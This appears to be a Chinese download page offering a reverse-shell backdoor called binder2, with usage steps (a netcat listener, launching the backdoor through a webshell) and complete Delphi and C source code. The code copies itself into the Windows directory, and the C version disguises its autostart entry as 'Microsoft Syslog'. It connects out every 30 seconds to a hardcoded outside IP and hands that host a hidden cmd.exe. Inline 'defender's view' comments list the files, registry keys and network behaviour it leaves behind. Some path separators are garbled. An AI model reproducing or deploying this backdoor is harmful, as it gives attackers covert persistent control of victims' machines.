
Delphi 版 binder2 反弹式后门程序及工具


Delphi 版 binder2 反弹式后门程序及工具

下载地址:http://downloads.2ccc.com/general/internet_lan/bander2.rar


Winsock2为kol socket单元文件,修改自c版代码binder2.c

使用说明:

binder2.exe 反弹式后门程序

简介:

在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.

用法:

1. 在本地机器监听一个端口:

netcat -vv -l -p 80

2. 通过webShell或是别的什么运行后门:

kol_binder2 80 youIPadd

3. 本地监听端口将截获一个来自远程主机的cmd.

注意:

程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:/winnt/下名为binder2.exe,并在
HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)

Code by hnxyy
Date:2005/6/16
QQ:19026695

program kol_binder2;

uses
Windows,Winsock2,winsock;

{ Parse S as an integer; when S is not a valid integer, return Default instead.
  Uses the RTL Val procedure so no SysUtils dependency is needed. }
function StrToIntDef(const S: string; Default: Integer): Integer;
var
  Parsed: Integer;
  ErrPos: Integer;
begin
  Val(S, Parsed, ErrPos);
  if ErrPos = 0 then
    Result := Parsed
  else
    Result := Default;
end;

{ Analysis notes (defender's view). Main block of the reverse-shell sample
  described in the text above. Flow: (1) install a persistence copy,
  (2) uninstall if invoked with "/kill", (3) take host/port from the command
  line or fall back to built-in defaults, (4) retry an outbound TCP connect
  every 30 s until it succeeds, (5) attach cmd.exe to that socket and wait.
  Host artifacts and network behaviour are called out inline. }
var
mykey :HKEY;
buffer,cmd :array[0..MAX_PATH] of char;   // buffer = install path, cmd = own module path
si :TStartupInfo;
wd :TWSAdata;
sock :TSocket;
pi :TProcessInformation;
sin :TSockAddrIn;
ip :pchar;                                // dotted-quad string handed to inet_addr
port :integer;
begin
// --- Persistence. Artifacts: a copy of the executable named binder2.exe in the
// Windows directory and an HKCU ...\Run value named "binder2" pointing at it.
// NOTE(review): path separators on this page are rendered as "/"; the original
// source most likely used backslashes and the page rendering garbled them.
GetWindowsDirectory(buffer,MAX_PATH);
lstrcat(buffer,'/binder2.exe');
GetModuleFileName(hInstance,cmd,MAX_PATH);
CopyFile(cmd,buffer,false);              // false = overwrite an existing copy
RegOpenKeyEx(HKEY_CURRENT_USER,'Software/Microsoft/Windows/CurrentVersion/Run',0,KEY_ALL_ACCESS,mykey);
// The value data length is sizeof(buffer) (the whole MAX_PATH+1 array), not the
// string length, so the stored REG_SZ carries whatever bytes follow the NUL.
// Return codes of both registry calls are ignored.
RegSetValueEx(mykey,'binder2',0,REG_SZ,@buffer,sizeof(buffer));

// --- Uninstall: "/kill" as the only argument removes the Run value and the
// copied file, then exits. Note the install step above has already run by then.
if (ParamCount=1) and (lstrcmpi(lpstr(ParamStr(1)),'/kill')=0) then
begin
RegDeleteValue(MyKey,'binder2');
DeleteFile(buffer);
ExitProcess(0);
end;

// --- Connect-back target. No arguments (or more than two): built-in defaults
// 127.0.0.1:1234. Otherwise ParamStr(1) is the port (non-numeric -> 0) and
// ParamStr(2) the IP. With exactly one argument ParamStr(2) is '', so ip is an
// empty string; presumably inet_addr then yields no usable address and the
// connect loop below never succeeds.
if (ParamCount<1) or (ParamCount>2) then
begin
port :=1234;
ip :='127.0.0.1';
end else
begin
port :=StrToIntDef(ParamStr(1),0);
ip :=lpstr(ParamStr(2));
end;

// --- Socket setup. The three commented-out lines are the earlier variant;
// the live code uses ZeroMemory, WSAStartup(1.1) and WSASocket with flags 0.
//FillChar(si,sizeof(si),#0);
//WSAStartup($101,wd);
//sock :=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
ZeroMemory(@si, SizeOf(si));
WSAStartup(MAKEWORD(1,1),wd);
sock :=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, nil, 0, 0);
sin.sin_family :=AF_INET;
  sin.sin_port :=htons(port);
  sin.sin_addr.s_addr :=inet_addr(ip);
// Retries forever, sleeping 30 s between attempts: on the wire this is a
// fixed-interval outbound connection attempt to ip:port (a beaconing signature).
while (connect(sock,sin,sizeof(sin))<>0) do Sleep(30000);

// --- Spawn cmd.exe with stdin/stdout/stderr all redirected to the socket,
// window hidden, handles inherited (bInheritHandles = TRUE). Endpoint signature:
// cmd.exe whose parent is binder2.exe and whose standard handles are a socket.
si.cb :=sizeof(si);
  si.dwFlags :=STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
  si.wShowWindow :=SW_HIDE;
si.hStdInput :=sock;
si.hStdOutput :=sock;
si.hStdError :=sock;

CreateProcess(nil,'cmd.exe',nil,nil,TRUE,CREATE_NEW_CONSOLE,nil,nil,si,pi);
// Blocks until cmd.exe exits, then releases the process handles, the socket
// and Winsock; the process stays alive for the whole shell session.
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseSocket(sock);
WSACleanup;
end.

附 binder2.exe c 版代码

/*
* Trivial Reverse cmd binder
*
* When LAN is full, ThreaT will walk on your network
*
******************************

compile : cl.exe binder2.c

Usage
_____

binder2.exe (backdoor the current workstation & connect to default IP for bind a cmd shell on default Port)
binder2.exe 123 (connect to default IP & bind a cmd shell on port 123)
binder2.exe 123 10.0.0.1 (connect to 10.0.0.1 & bind a cmd shell on port 123)
binder2 /kill (remove startkey of the registery)

******************************
*
*
ThreaT@Ifrance.com
* http://s0h.cc/~threat/
*
*/

#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")

/* Win entry point (sa evite d'avoir une grosse console crade qui s'affiche ) */

int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,    
LPSTR lpszCmdLine,
int nCmdShow
)
{
  /* Analysis notes (defender's view). Original C sample of the reverse-shell
   * backdoor described above. Flow: persist -> parse arguments -> connect back
   * (retrying every 30 s) -> spawn cmd.exe on the socket -> return at once.
   * NOTE(review): the "//" and "/x00" sequences inside string literals below
   * are most likely "\\" and "\x00" garbled by the page rendering; they are
   * reproduced here exactly as rendered. */

  WSADATA wd;
  HKEY MyKey;
  SOCKET sock;
  STARTUPINFO si;
  PROCESS_INFORMATION pi;
  struct sockaddr_in sin;
  char buffer[MAX_PATH], cmd[MAX_PATH], *p,
     
  IP[16] = "81.91.66.30/x00";   // default IP address (here www.s0h.cc)
  unsigned short port = 1234;   // default port

  /* Persistence: copy self into the Windows directory as syslog.exe and register
   * that path under HKCU ...\Run as the value "Microsoft Syslog". Both the file
   * name and the value name are host artifacts to hunt for. Registry return
   * codes are not checked. */
  GetWindowsDirectory (buffer,MAX_PATH);
  lstrcat (buffer,"//syslog.exe/x00");
  GetModuleFileName (NULL,cmd,MAX_PATH);

  CopyFile (cmd,buffer,FALSE);
  RegOpenKeyEx(HKEY_CURRENT_USER,"Software//Microsoft//Windows//CurrentVersion//Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);
  RegSetValueEx (MyKey,"Microsoft Syslog",(DWORD)NULL,REG_SZ,( CONST BYTE * )&buffer,strlen (buffer));

  /* Optional arguments. strtok() writes a NUL after the first token, so the
   * lstrcmpi/atoi calls below only ever see that first token: either "/kill"
   * (delete the Run value and exit -- the copied file is left in place) or the
   * port. A second token, if present, replaces the IP (lstrcpyn keeps at most
   * 15 characters plus the terminator). An empty command line skips all of this. */
  p = strtok (lpszCmdLine," ");    
  if (lpszCmdLine[0] == '/' || IsCharAlphaNumeric(lpszCmdLine[0]))
  {
      if (!lstrcmpi (lpszCmdLine,"/kill")) { RegDeleteValue(MyKey,"Microsoft Syslog"); ExitProcess (0);}
      else port = atoi (lpszCmdLine);

      if ( p = strtok (NULL," ") ) lstrcpyn (IP,p,16);
  }

  /* Socket setup */
  memset(&si, 0, sizeof(si));
  WSAStartup(MAKEWORD( 1, 1 ), &wd);

  // David Litchfield in his Blackhat talk said... (PJ)
  sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
 
  sin.sin_family = AF_INET;
  sin.sin_port = htons(port);
  sin.sin_addr.s_addr = inet_addr(IP);

  /* Retry the connection every 30 seconds until it succeeds: a fixed-interval
   * outbound connection attempt to IP:port is this beacon's network signature. */
  while ( connect(sock, (struct sockaddr*)&sin, sizeof (sin)) ) Sleep (30000);
 
  /* Launch the shell and leave: cmd.exe inherits the socket as stdin/stdout/
   * stderr with its window hidden. This process does not wait for cmd.exe,
   * never closes the socket or calls WSACleanup, and simply returns 0. */
  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
  si.wShowWindow=SW_HIDE;
  si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
  CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi );
  return 0;
}
